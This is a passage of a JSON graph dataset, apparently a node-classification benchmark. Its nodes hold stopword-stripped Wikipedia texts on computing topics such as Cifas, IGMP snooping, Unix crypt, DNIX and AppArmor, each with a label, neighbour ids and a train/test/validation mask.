      2282,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      4888,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      11257,
      9022,
      1346,
      8003,
      10562,
      6981,
      838,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      9063,
      10602,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 6609,
    "label": 1,
    "text": "Cifas:cifas cifas fraud prevention service united kingdom not-for-profit membership association representing organisations across public private voluntary sectors 2016 cifas 360 member organisations cifas states mission ‘ detect deter prevent fraud society harnessing technology working partnership ’ cifas operates two core fraud prevention databases largest uk national fraud database internal fraud database systems also used banks building societies access home office immigration data specialist portal data cifas members revealed instances identity fraud uk reached record levels 2016 particularly among people aged 30 trend continued 2017 cifas reporting 89,000 cases identity fraud first six months year cifas data 2016 2017 also highlighted growing issue money mules – people allow bank accounts used launder money cifas reported number young people 18-24-year-olds allowing accounts used transfer proceeds crime risen unprecedented 75 per cent last year cifas established 1988 consumer credit trade association ccta acronym cifas credit industry fraud avoidance system although company longer operates acronym remit broadened developed association office fair trading well information commissioner office continue day take active interest development cifas cifas today run board directors includes independent directors chief executive deputy chief executive 1988 2016 majority directors elected participating organisations participate governance organisation advisory board cifas national fraud database allows participating organisations exchange confirmed details applications products services considered fraudulent exchange confirmed information accounts services fraudulently misused confirmed information insurance claims considered fraudulent organisations also exchange information innocent victims fraud protect fraud internal fraud database allows participating organisations exchange details confirmed cases applicant member staff acted fraudulently data protection act individual right make subject access request cifas accordance act disclose data held individual statutory fee cifas credit reference agency 2014 immigration act became law cifas named sole provider home office immigration data launched cifas immigration portal cip december 2014 current account-providing banks building societies uk required use cip access home office data disqualified persons victims identity fraud people risk identity fraud apply cifas protective registration fee protective registration acts warning organisation carry additional checks verify identity applicant customer cifas also operates protecting vulnerable scheme helps local authorities protect individuals subject mental capacity act 2005 care cifas works fraud prevention financial public sector academic charitable organisations law enforcement raise awareness fraud promote best practice fraud prevention collaborative partners include city london police cipfa home office age uk financial fraud action uk cifas member joint fraud taskforce set former home secretary theresa may 2015",
    "neighbors": [
      5133
    ],
    "mask": "Test"
  },
  {
    "node_id": 6610,
    "label": 8,
    "text": "Plasmapper:plasmapper plasmapper plasmid mapper freely available web server automatically generates annotates high-quality circular plasmid maps particularly useful online service molecular biologists wishing generate plasmid maps without purchase maintain expensive commercial software plasmapper accepts plasmid/vector dna sequence input fasta format uses sequence pattern matching blast sequence alignment automatically identify label common promoters terminators cloning sites restriction sites reporter genes affinity tags selectable marker genes origins replication open reading frames plasmapper reformats presents identified features simple textual form high-resolution multicolored image appearance content output customized numerous ways using variety online options plasmapper images rendered rasterized portable network graphics png jpg scalable vector graphics svg formats accommodate variety user needs preferences images textual output sufficient quality may used directly publications presentations",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6611,
    "label": 1,
    "text": "Placenames_Database_of_Ireland:placenames database ireland placenames database ireland also known logainm.ie database archive place names ireland created fiontar dublin city university collaboration placenames branch department culture heritage gaeltacht website public resource primarily aimed journalists translators students teachers historians researchers genealogy placenames commission established department finance 1946 advise ordnance survey ireland government irish name places placenames commission ceased 11 october 2012 placenames committee took place 19 september 2013 placenames branch branch department culture heritage gaeltacht established official languages act 2003 supports placenames commission/committee investigating historical irish-language names places although 1922 constitution irish free state current constitution adopted 1937 make irish national language law regard placenames carried 19th-century uk statutes established ordnance survey griffith valuation english-language name official status irish-language names adopted place english-language names 1920 e.g king county became laois kells county meath became ceannanus mór department posts telegraphs adopted irish names ad-hoc sometimes inconsistent disputed locals irish-language scholars 1973 oireachtas passed act codify official assignment irish names alongside rather instead english names 1975 first statutory instrument made 1973 gave official irish names post towns names chosen advice placenames branch differed adopted previous decades cases causing controversy 1973 act replaced 2003 act terms placenames committee continues advise minister prior issuing statutory instruments database website www.logainm.ie european language label 2010 category winner 2011 2016 irish egovernment awards",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 6612,
    "label": 0,
    "text": "Semantometrics:semantometrics semantometrics tool evaluating research functionally extension tools bibliometrics webometrics altmetrics instead evaluating citations – entails relying outside evidence – uses semantic evaluation full text research paper evaluated",
    "neighbors": [
      1890
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6613,
    "label": 5,
    "text": "IGMP_snooping:igmp snooping igmp snooping process listening internet group management protocol igmp network traffic control delivery ip multicasts network switches igmp snooping listen igmp conversation hosts routers maintain map links need ip multicast transmission multicasts may filtered links need conserving bandwidth links switch default flood multicast traffic ports broadcast domain vlan equivalent multicast cause unnecessary load host devices requiring process packets solicited purposefully exploited form basis denial-of-service attack igmp snooping designed prevent hosts local network receiving traffic multicast group explicitly joined provides switches mechanism prune multicast traffic links contain multicast listener igmp client essentially igmp snooping layer 2 optimization layer 3 igmp igmp snooping takes place internally switches protocol feature igmp snooping allows switch forward multicast traffic links solicited snooping therefore especially useful bandwidth-intensive ip multicast applications iptv igmp snooping although important technique overlaps two standards organizations namely ieee standardizes ethernet switches ietf standardizes ip multicast means clear standards body responsible technique igmp snooping carries informational status despite actually referred standards work normative order igmp thus igmp snooping function multicast router must exist network generate igmp queries without querier igmp membership reporting may incomplete tables associating member ports multicast groups potentially incomplete snooping work reliably igmp snooping implementations include full querier capability igmpv2 igmpv3 contain provision selecting querier multiple available querier lowest ip address given role igmp general queries querier must unconditionally forwarded switches involved igmp snooping igmp snooping proxy reporting report suppression actively filters igmp packets order reduce load multicast router joins leaves heading upstream router filtered minimal quantity information sent switch trying ensure router single report group regardless many active listeners two active listeners group first one leaves switch determines router need information since affect status group router point view next time routine query router switch forward reply remaining host presence proxy reporting router generally know recently joined member group",
    "neighbors": [
      10461,
      2409,
      1411,
      2509
    ],
    "mask": "Train"
  },
  {
    "node_id": 6614,
    "label": 4,
    "text": "Attack_Surface_Analyzer:attack surface analyzer attack surface analyzer tool created analysis changes made attack surface operating systems since windows vista beyond tool recommended microsoft sdl guidelines verification stage development according microsoft sdl team one tool checking changes made attack surface windows operating system attack surface analyzer developed problem check verify effects various software installations system way back since windows server 2003 developed back use multiple tools every type change made attack surface painful process check everything using multiple tools problem made microsoft create application developers could analyze changes made windows attack surface first used developers microsoft later january 18 2011 beta version version 5.1.3.0 tool named attack surface analyzer released public testers administrators attack surface analyzer compare two scan data system called baseline scan product scan 32-bit 64-bit versions software available windows vista windows 7 respective server editions news windows xp version released attack surface analyzer one tool analysis changes made various parts attack surface windows 6 series operating system includes windows vista windows 7 using one tool analyze changes made registry file permissions windows iis server gac assemblies lot done according microsoft tool use engineers security team microsoft analyze effects software installation windows operating system would possible one tool would use different software different parts windows combine effects logically tool enlists various elements enumerates running system scan elements list comprehensive set elements possible well important elements changed new software installed system software might change elements list change different elements system attack surface analyzer combines easier analyze parts attack surface analyzer tell changes sure cases also able tell particular change configuration causing threat tool enlist threats categories parts operating system scans noticeable issues services configurations file system acls issues related processes running system getting list threats system great thing software released microsoft one knows windows better microsoft improved concerns security shown microsoft important severity threat also known team enterprise attack surface analyzer also shows severity threats finds however seems report severity every threat instead shows severity threat category example severity threat caused “ executables weak acls ” threat severity level 1 less caused “ processes impersonation tokens ” threat severity level 2 surely desirable feature enlist level severity caused threat rather category belongs however news might available every organization experts various domains security may case network security expert organization aware details terminology domain say windows services however two issues may connected possible case important experts two security expert teams know everything terms use might required cases brief description along link technet library describing term detail threats changes attack surface enlisted report generated attack surface analyzer brief description usually enough experts might needed cases microsoft made easy find right resource term rather relying upon web search engines attack surface windows operating system concerns various parts operating system would difficult anyone understand report changes listed serial order attack surface analyzer makes easy user browse report listing threats categories providing table contents html page attack surface analyzer compare two scan data generated two different scans generate report viewed html format also possible run scans one system generate another system using tool good windows vista clients possible generate report using current version attack surface analyzer windows vista case attack surface analyzer used run scans windows vista client transfer scan result files computer running windows 7 generate browse report windows 7 based computer attack surface analyzer works windows 6.x series operating systems report generation done 6.1 version operating systems following system requirements attack surface analyzer official download page installable windows vista windows 7 windows server 2008 windows server 2008 r2 collection attack surface data windows vista windows 7 windows server 2008 windows server 2008 r2 analysis attack surface data report generation windows 7 windows server 2008 r2 microsoft .net 3.5 sp1 microsoft enlisted hardware requirements separately tool able perform job machine meeting hardware requirements installed operating system note however running time generation scan data report depends hardware capabilities better hardware would get work done faster attack surface analyzer list two types scans namely baseline scan product scan strict technical terms scans difference logical technical scan run user run generate data initial system data compared product scan running baseline scan product whose effect attack surface operating system checked installed installation changes system configuration possibly installing services changing firewall rules installing new .net assemblies baseline scan logical scan run user using attack surface analyzer generates file containing configuration system software installed product scan signifies state system ‘ product ’ installed context product software whose effects system upon installation checked generate report two scans required minimum product scan would capture changes made system installation software product testing scan data generated scan compared baseline scan data find changes made system configurations different points worth note one system state captured using attack surface analyzer combination used report generation however ‘ baseline scan ’ one taken automatically called product scan",
    "neighbors": [
      9441,
      8386,
      4423,
      4074,
      6797,
      2383,
      7983,
      3573,
      4439,
      8094
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6615,
    "label": 7,
    "text": "Warewulf:warewulf warewulf computer cluster implementation toolkit facilitates process installing cluster long term administration changing administration paradigm make slave node file systems manageable one point automate distribution node file system node boot allows central administration model slave nodes includes tools needed build configuration files monitor control nodes totally customizable adapted type cluster software administration perspective make much difference running 2 nodes 500 nodes procedure still warewulf scalable admins perspective also uses standard chroot'able file system every node extremely configurable lends custom environments easily warewulf designed hpc system hpc system warewulf along lines distributed linux distribution specifically system replicating managing small lightweight linux systems one master using warewulf hpc packages lam/mpi/mpich sun grid engine pvm etc easily deployed throughout cluster warewulf solves problem slave node management rather strict hpc specific system even though designed hpc mind flexible home grown cluster administratively scales well result flexibility ease customization warewulf used production hpc implementations also development systems like kasy0 first system break one hundred dollar per gflops barrier non hpc systems web server cluster farms intrusion detection clusters high-availability clusters",
    "neighbors": [
      225,
      9762,
      6597,
      823,
      4149,
      2710,
      3927,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 6616,
    "label": 2,
    "text": "Proportional_set_size:proportional set size computing proportional set size pss portion main memory ram occupied process composed private memory process plus proportion shared memory one processes unshared memory including proportion shared memory reported pss example since pss defined sum unshared memory process proportion memory shared processes pss two processes follows concept mostly related unique linux operating system proposed matt mackall complications arose trying count real memory used process concepts resident set size virtual memory size vmsize n't helping developers tried know much memory programs using",
    "neighbors": [
      6543,
      1025,
      2383,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6617,
    "label": 4,
    "text": "Crypt_(Unix):crypt unix unix computing crypt utility program used encryption due ease breaking considered obsolete cryptographer robert morris wrote crypt first appeared version 3 unix encourage codebreaking experiments morris managed break crypt hand dennis ritchie automated decryption method james reeds improved version appeared version 7 reeds peter j. weinberger also broke also unix password hash function name crypt though used encrypting data sense otherwise essentially unrelated distinguish two writers often refer utility program crypt 1 documented section 1 unix manual pages refer password hash function crypt 3 documentation section 3 manual crypt 1 simple command encrypt decrypt data usually used filter traditionally implemented using algorithm based enigma machine considered cryptographically far weak provide security brute-force attacks modern commodity personal computers versions unix shipped even weaker version crypt 1 command order comply contemporaneous laws regulations limited exportation cryptographic software simply implementations caesar cipher effectively secure rot13 implemented caesar cipher well-known key linux distributions generally include unix compatible version crypt command largely due combination three major factors source code several old versions crypt command available unix heritage society unix archive recent crypt source code available opensolaris project enhanced symmetric encryption utilities available linux also portable unix-like system including mcrypt ccrypt provide support much sophisticated modern algorithms used encrypt decrypt files compatible traditional crypt 1 command providing correct command line options programs breaking crypt 1 encryption widely available bob baldwin crypt breaker workbench written 1984-1985 interactive tool provides successive plaintext guesses must corrected user peter selinger unixcrypt-breaker uses simple statistical model guess plausible plaintexts require user interaction",
    "neighbors": [
      3488,
      3937,
      2050,
      6369,
      7556,
      8867,
      9444,
      10881,
      11363,
      4140,
      5357,
      7983,
      9298,
      5492,
      5397,
      310,
      9306,
      733
    ],
    "mask": "Test"
  },
  {
    "node_id": 6618,
    "label": 7,
    "text": "Plug_computer:plug computer plug computer external device often configured use home office compact computer consists high-performance low-power system-on-a-chip processor several i/o ports usb ports ... typically runs number linux distributions versions provisions connecting display best suited running media server back-up services file sharing remote access functions thus acting bridge in-home protocols digital living network alliance dlna server message block smb cloud based services however plug computer offerings analog vga monitor and/or hdmi connectors along multiple usb ports permit use display keyboard mouse thus making full-fledged low-power alternatives desktop notebook computers name plug computer derived small configuration devices plug computers often enclosed ac power plug ac adapter plug computers typically consume little power inexpensive one manufacturer claims 119 plug computer draws 1.2 watts cost 2 year run number devices type began appear 2009 consumer electronics show chippc another one",
    "neighbors": [
      1537,
      3585,
      2308,
      7300,
      4236,
      10893,
      911,
      1935,
      4623,
      1682,
      8592,
      10768,
      405,
      2965,
      2328,
      4377,
      8986,
      5019,
      10265,
      6178,
      291,
      6307,
      3238,
      5159,
      9766,
      6444,
      10109,
      558,
      8495,
      3121,
      5681,
      9266,
      823,
      7352,
      1849,
      1083,
      1728,
      1089,
      2496,
      4289,
      10820,
      1224,
      1480,
      8520,
      11337,
      4429,
      7248,
      3537,
      1362,
      467,
      9682,
      5339,
      10715,
      6367,
      2784,
      4194,
      11646,
      3300,
      5732,
      10090,
      3819,
      7660,
      2285,
      8044,
      10223,
      2420,
      2170,
      5499,
      253,
      8446,
      8319
    ],
    "mask": "Test"
  },
  {
    "node_id": 6619,
    "label": 7,
    "text": "UKCloud:ukcloud ukcloud previously named skyscape cloud services british public cloud company headquartered farnborough united kingdom one largest uk cloud providers company founded 2011 rebranding ukcloud august 2016 ukcloud cloud provider several customers including genomics england ministry justice cabinet office amongst others company established 2011 co-founders jeff thomas jeremy sanders phil dawson simon hansford skyscape cloud services changed name ukcloud ltd five years later following legal wrangle sky ukcloud services provided partnership qinetiq vmware cisco dell emc ark data centres ukcloud focuses changing uk government purchases uses services detailed march 2011 uk government ict strategy company since sold government g-cloud frameworks digital marketplace since first iteration framework 2012 offer multi-cloud platform consisting vmware oracle openstack microsoft azure ukcloud subject regular audits assessments inspections certification bodies regulators accreditors firm recently achieved iso27017 iso27018 also certified iso9001 iso20000 iso27001 ukcloud carbon neutral company offers customers carbon neutral hosting achieved independent assessment co2 emissions produced direct indirect sources required deliver followed offset-inclusive emissions reduction programme ukcloud also completely sovereign cloud provider meaning applications data hosted uk datacentres company incorporated british company uk legal jurisdiction 2016 ukcloud communications deloitte technology fast 500 emea award also cloudex 20:20 award uk industry award 2013. winners sunday times hiscox tech track 100 2016 ukcloud winners tech track 100 ranking number 1 league table 2016 2017 ukcloud announced recipients prestigious queen ’ awards enterprise innovation 2018 ukcloud award g-cloud public sector provider year second year consecutively company also featured one future fifty ’ fastest growing technology companies addition founding alliance partners ukcloud since announced cloud native cloud platform based upon redhat openstack oracle cloud platform",
    "neighbors": [
      6153
    ],
    "mask": "Test"
  },
  {
    "node_id": 6620,
    "label": 4,
    "text": "Xymon:xymon xymon network monitoring application using free software operates gnu general public license central server runs unix linux hosts application inspired open-source version big brother network monitoring application maintains backward compatibility 2002 2004 henrik storner wrote open-source software add-on called bbgen toolkit march 2005 stand-alone version released called hobbit versions released 2005 2008 since prior user trademark hobbit existed tool finally renamed xymon january 2012 quest software discontinued development big brother xymon offers graphical monitoring showing status various network services device well range application operating system metrics listing number mail messages queued defined level downtime web-based graphical display uses red/yellow/green condition icon host/test top colored background indicating current worst status across hosts tests user click colored icon view specific details available relevant graphs metric statistics built-in reporting tools include sla-type reports availability historical state services snapshots xymon supports generation alarms sent email also use external tools send messages via means eg sms networked hosts devices monitored xymon server using network probes supporting large extensible range protocols including smtp http/s dns hosts use supported operating system also run xymon client also free software additionally collect operating system application monitoring metrics report xymon server clients available unix linux formats including source tarball rpm debian package xymon download site sourceforge windows hosts use big brother client windows bbwin client winpsclient written windows powershell scripting language plugins extend monitoring new types applications services many extension scripts big brother run unchanged xymon",
    "neighbors": [
      5096,
      7983,
      5492,
      5397,
      823,
      1211,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 6621,
    "label": 4,
    "text": "Bicycle_attack:bicycle attack tls bicycle attack refers method discovering password length encrypted packets transmitted via ssl https term first coined december 30 2015 guido vranken wrote premise bicycle attack makes brute-forcing passwords much easier length passwords known moreover refutes idea ssl-encrypted http packets obscure length",
    "neighbors": [
      7556,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6622,
    "label": 2,
    "text": "Open_Source_Business_Alliance:open source business alliance open source business alliance e.v german non-profit operates europe biggest network companies organizations developing building using open source software alliance founded july 2011 stuttgart two founding associations linux solutions group e.v lisog live linux-verband e.v. officially merged groups annual general meetings 20th 21 july 2011 merger aimed create unified lobby group german open-source movement 2014 attempted consolidation failed osb alliance open source business foundation osbf first announced intention merge two associations form single large advocacy group 18 november 2013 almost year negotiations achieved agreement merger collapsed 15 october 2014 alliance main aims central objectives alliance current board open source business alliance e.v consists 11 members honorary chairman osb alliance supports working groups cover wide range issues january 2015 following working groups operation",
    "neighbors": [
      3969,
      546,
      4194,
      10851,
      10971,
      5800,
      9320,
      1101,
      4429,
      8909,
      2864,
      9455,
      467,
      8147,
      823,
      3323,
      6780,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 6623,
    "label": 4,
    "text": "ZeroFOX:zerofox zerofox cyber security company based baltimore maryland provides cloud-based software service saas organizations detect risks found social media digital channels phishing malware scams impersonator accounts piracy counterfeit zerofox created 2013 name riskive changed current name months later company began startup 8,000 sq ft. space inside betamore startup incubator baltimore federal hill neighborhood 2015 zerofox raised 27 million series b funding 2016 company outgrown space moved 18,000 sq ft. space inside former pabst brewing facility south baltimore 2017 zerofox raised 40 million funding led redline capital management european venture firm silver lake waterman fund focuses pre-ipo companies prior investors new enterprise associates highland capital partners core capital also contributed investment helped bring zerofox ’ total funding 88 million",
    "neighbors": [
      7515,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6624,
    "label": 2,
    "text": "DNIX:dnix dnix original spelling d-nix unix-like real-time operating system swedish company dataindustrier ab diab version called abcenix also developed abc1600 computer luxor daisy systems also something called daisy dnix cad workstations unrelated diab product dataindustrier ab literal translation computer industries shareholding company started 1970 lars karlsson single-board computer manufacture sundsvall sweden producing zilog z80-based computer called data board 4680 1978 diab started work swedish television company luxor ab produce home office computer series abc 80 abc 800 1983 diab independently developed first unix-compatible machine diab ds90 based motorola 68000 cpu d-nix made appearance based unix system v license diab however industrial automation company needed real-time operating system company replaced t-supplied unix kernel in-house developed yet compatible real-time variant kernel originally z80 kernel called os8 time company also replaced several unix standard userspace tools implementations point code derived unix machines could deployed independently unix license two years later cooperation luxor computer called abc 1200 developed office market parallel diab continue produce enhanced versions ds90 computer using newer versions motorola cpus motorola 68010 68020 68030 eventually 68040 1990 diab acquired groupe bull continued produce support ds machines brand name diab names diab 2320 diab 2340 etc. still running diabs version dnix isc systems corporation isc purchased right use dnix late 1980s use line motorola 68k-based banking computers isc later bought olivetti turn resold wang bought getronics corporate entity often referred 'isc answered bewildering array names years code branch svr2 compatible version received extensive modification development hands notable features operating system support demand paging diskless workstations multiprocessing asynchronous i/o ability mount processes handlers directories file system message passing real-time support consisted largely internal event-driven queues rather list search mechanisms 'thundering herd static process priorities two classes run completion timesliced support contiguous files avoid fragmentation critical resources memory locking quality orthogonal asynchronous event implementation yet equalled current commercial operating systems though approach concept yet adopted synchronous marshalling point asynchronous activity could asynchronous ad infinitum dnix handled aplomb asynchronous i/o facility obviated need berkeley sockets select svr4 streams poll mechanism though socket emulation library preserved socket semantics backward compatibility another feature dnix none standard utilities ps frequent offender rummaged around kernel memory job system calls used instead meant kernel internal architecture free change required handler concept allowed network protocol stacks outside kernel greatly eased development improved overall reliability though performance cost also allowed foreign file systems user-level processes improved reliability main file system though could external process pulled kernel performance reasons dnix could well considered microkernel though formally developed handlers could appear type 'native unix file directory structure device file i/o requests handler could process could passed handlers including underlying one upon handler mounted handler connections could also exist passed around independent filesystem much like pipe one effect tty-like 'devices could emulated without requiring kernel-based pseudo terminal facility example handler saved day isc diskless workstation support bug implementation meant using named pipes workstation could induce undesirable resource locking fileserver handler created workstation field accesses afflicted named pipes appropriate kernel fixes could developed handler required approximately 5 kilobytes code implement indication non-trivial handler need large isc also received right manufacture diab ds90-10 ds90-20 machines file servers multiprocessor ds90-20 however expensive target market isc designed servers ported dnix isc designed gui-based diskless workstations use file servers ported dnix though isc used daisy workstations running daisy dnix design machines would run diab dnix negligible confusion internally drafting layout staff rarely talked software staff moreover hardware design staff n't use either system running joke went something like isc build computers n't use asynchronous i/o support dnix allowed easy event-driven programming workstations performed well even though relatively limited resources gui diskless workstation 7 mhz 68010 processor usable 512k memory kernel consumed approximately half workstations 1 mb memory though later 2 mb 4 mb versions along 10 mhz processors full-blown installation could consist one server 16 mhz 68020 8 mb ram 200 mb hard disk 64 workstations though slow boot array would perform acceptably bank teller application besides innate efficiency dnix associated diab c compiler key high performance generated particularly good code 68010 especially isc got done isc also retargeted texas instruments tms34010 graphics coprocessor used last workstation diab c compiler course used build dnix one factors contributing efficiency still available form wind river systems systems still use writing 2006 former seattle-first national bank branches branded bank america may probably isc customers still using dnix capacity isc considerable dnix presence central south america dnix native system call dnix 2 library function analogous standard unix unix 2 syscall 2 function took multiple arguments first function code semantically single call provided appropriate unix functionality though syntactically different unix course numerous dnix-only extensions dnix function codes organized two classes type 1 type 2 type 1 commands associated i/o activity anything could potentially cause issuing process block major examples f_open f_close f_read f_write f_iocr f_iocw f_wait f_nap type 2 remainder f_getpid f_gettime etc could satisfied kernel immediately invoke asynchronicity special file descriptor called trap queue created via type 2 opcode f_otq type 1 call would f_nowait bit or-ed function value one additional parameters dnix 2 trap queue file descriptor return value asynchronous call normal value kernel-assigned identifier time asynchronous request completed read 2 f_read trap queue file descriptor would return small kernel-defined structure containing identifier result status f_cancel operation available cancel asynchronous operation n't yet completed one arguments kernel-assigned identifier process could cancel requests currently owned exact semantics cancellation request handler fundamentally meant waiting terminated partially completed operation could returned addition kernel-assigned identifier one arguments given asynchronous operation 32-bit user-assigned identifier often referenced function pointer appropriate subroutine would handle i/o completion method merely convention entity read trap queue elements responsible interpreting value note asynchronous events gathered via normal file descriptor read operations reading capable made asynchronous implications semi-autonomous asynchronous event handling packages could exist within single process dnix 5.2 lightweight processes threads also note potentially blocking operation capable issued asynchronously dnix well equipped handle many clients single server process process restricted one trap queue i/o requests could grossly prioritized way addition native dnix 2 call complete set 'standard libc interface calls available open 2 close 2 read 2 write 2 etc besides useful backwards compatibility implemented binary-compatible manner ncr tower computer binaries compiled would run unchanged dnix dnix kernel two trap dispatchers internally one dnix method one unix method choice dispatcher programmer using interchangeably acceptable semantically identical wherever functionality overlapped machines 68000 trap 0 instruction used unix 2 calls trap 4 instruction dnix 2 two trap handlers really quite similar though usually hidden unix 2 call held function code processor d0 register whereas dnix 2 held stack rest parameters dnix 5.2 networking protocol stacks internally except thin x.25-based ethernet protocol stack added isc use diskless workstation support package networking conducted reading writing handlers thus socket mechanism libsocket 3 existed used asynchronous i/o talk tcp/ip handler typical berkeley-derived networking program could compiled run unchanged modulo usual unix porting problems though might efficient equivalent program used native asynchronous i/o dnix process could used handle i/o requests extend filesystem process called handler major feature operating system handler defined process owned least one request queue special file descriptor procured one two ways f_orq f_mount call former invented isolated request queue one end typically handed child process network remote execution programs many used method provide standard i/o paths children latter hooked filesystem file i/o requests could adopted handlers network login programs even used method provide standard i/o paths children semantics logging unix requires way multiple perhaps-unrelated processes horn standard i/o path operator mounted directory filesystem handler received i/o calls point handler would read small kernel-assigned request data structures request queue reading could done synchronously asynchronously handler author desired handler would whatever request required satisfied often using dnix f_uread f_uwrite calls read write request data space would terminate request appropriately using f_termin privileged handler could adopt permissions client individual requests subordinate handlers filesystem via f_t1req call n't need reproduce subordinate permission scheme handler unable complete request f_passrq function could used pass i/o requests one handler another handler could perform part work requested passing rest another handler common handler state-machine oriented requests fielding client done asynchronously allowed single handler field requests multiple clients simultaneously without blocking unnecessarily part request structure process id priority handler could choose work first based upon information requirement work performed order requested aid possible poll request trap queues see work considered buckling actually particular restriction number request queues process could used provide networking facilities chroot jails example give appreciation utility handlers isc handlers existed isc purchased 5.2 svr2 compatible 5.3 svr3 compatible versions dnix time purchase dnix 5.3 still undergoing development diab dnix 5.2 deployed time isc engineers incorporated 5.3 kernel features 5.2 primarily shared memory ipc divergence features diab isc versions dnix diab 5.3 likely went contain svr3 features isc 5.2 ended also diab went dnix 5.4 svr4 compatible os isc developers considerably extended version dnix 5.2 listed features involving kernel based upon needs general trends unix industry dnix development isc effectively ceased 1997 number planned os features left table",
    "neighbors": [
      2179,
      6276,
      6787,
      7299,
      10883,
      7305,
      6412,
      6675,
      7187,
      5397,
      9366,
      7319,
      1304,
      2201,
      2073,
      9628,
      6813,
      3487,
      9762,
      10788,
      5029,
      5413,
      3241,
      6187,
      10030,
      7983,
      3248,
      10926,
      2995,
      9141,
      823,
      3512,
      8504,
      9784,
      6207,
      9151,
      321,
      10561,
      10436,
      1221,
      9927,
      6985,
      9162,
      5969,
      9300,
      341,
      86,
      1109,
      10590,
      6369,
      5603,
      5220,
      1253,
      1126,
      7269,
      11112,
      8298,
      4333,
      10482,
      5492,
      7286,
      11383,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6625,
    "label": 2,
    "text": "AppArmor:apparmor apparmor application armor linux kernel security module allows system administrator restrict programs capabilities per-program profiles profiles allow capabilities like network access raw socket access permission read write execute files matching paths apparmor supplements traditional unix discretionary access control dac model providing mandatory access control mac included mainline linux kernel since version 2.6.36 development supported canonical since 2009 addition manually creating profiles apparmor includes learning mode profile violations logged prevented log used generating apparmor profile based program typical behavior apparmor implemented using linux security modules lsm kernel interface apparmor offered part alternative selinux critics consider difficult administrators set maintain unlike selinux based applying labels files apparmor works file paths proponents apparmor claim less complex easier average user learn selinux also claim apparmor requires fewer modifications work existing systems example selinux requires filesystem supports security labels thus provide access control files mounted via nfs apparmor filesystem-agnostic apparmor represents one several possible approaches problem restricting actions installed software may take selinux system generally takes approach similar apparmor one important difference selinux identifies file system objects inode number instead path apparmor inaccessible file become accessible hard link created selinux inode-based model would still deny access newly created hard links hard link would pointing inaccessible inode selinux apparmor also differ significantly administered integrate system isolation processes also accomplished mechanisms like virtualization one laptop per child olpc project example sandboxes individual applications lightweight vserver 2007 simplified mandatory access control kernel introduced 2009 new solution called tomoyo included linux 2.6.30 like apparmor also uses path-based access control apparmor first used immunix linux 1998–2003 time apparmor known subdomain reference ability security profile specific program segmented different domains program switch dynamically apparmor first made available sles opensuse first enabled default sles 10 opensuse 10.1 may 2005 novell acquired immunix rebranded subdomain apparmor began code cleaning rewriting inclusion linux kernel 2005 september 2007 apparmor maintained novell novell suse legal owner trademarked name apparmor apparmor first successfully ported/packaged ubuntu april 2007 apparmor became default package starting ubuntu 7.10 came part release ubuntu 8.04 protecting cups default ubuntu 9.04 items mysql installed profiles apparmor hardening continued improve ubuntu 9.10 ships profiles guest session libvirt virtual machines evince document viewer optional firefox profile apparmor integrated october 2010 2.6.36 kernel release apparmor integrated synology dsm 5.1 beta 2014 apparmor enabled solus release 3 2017/8/15 apparmor enabled default debian 10 buster",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      5179,
      4161,
      8772,
      6213,
      2118,
      3654,
      8268,
      589,
      593,
      1107,
      4192,
      10851,
      6244,
      5222,
      10856,
      8298,
      4207,
      5755,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      5279,
      2723,
      8364,
      3245,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      3791,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      5860,
      2278,
      233,
      4841,
      7403,
      7913,
      10482,
      9971,
      2294,
      8438,
      8439,
      5369,
      2809,
      11513,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      6445,
      7983,
      1844,
      10036,
      823,
      6968,
      7992,
      318,
      3911,
      8520,
      6988,
      10063,
      10580,
      4951,
      5975,
      11095,
      5990,
      10091,
      7020,
      2930,
      1396,
      7540,
      8573,
      1406,
      8066,
      900,
      8582,
      5514,
      4493,
      9621,
      11669,
      1431,
      8602,
      926,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      8112,
      11184,
      1972,
      439,
      9667,
      457,
      975,
      3550,
      2529,
      8676,
      2021,
      1513,
      3055,
      5105,
      8177,
      2036,
      5620,
      8186,
      2044,
      2045,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 6626,
    "label": 0,
    "text": "Snack_Sound_Toolkit:snack sound toolkit snack sound toolkit cross-platform library written kåre sjölander swedish royal technical university kth bindings scripting languages tcl python ruby provides audio i/o audio analysis processing functions spectral analysis pitch tracking filtering related graphics functions display sound pressure waveform spectrogram available microsoft windows linux mac os x solaris hp-ux freebsd netbsd irix snack sound toolkit used number linguistic research tools including wavesurfer transcriber sndbite well applications snackamp mp3 music player used academic research delft university technology springer collection perception multimodal dialogue systems includes research essay utilizing snack human-computer speech interaction toolkit included component activestate tcl python distributions",
    "neighbors": [
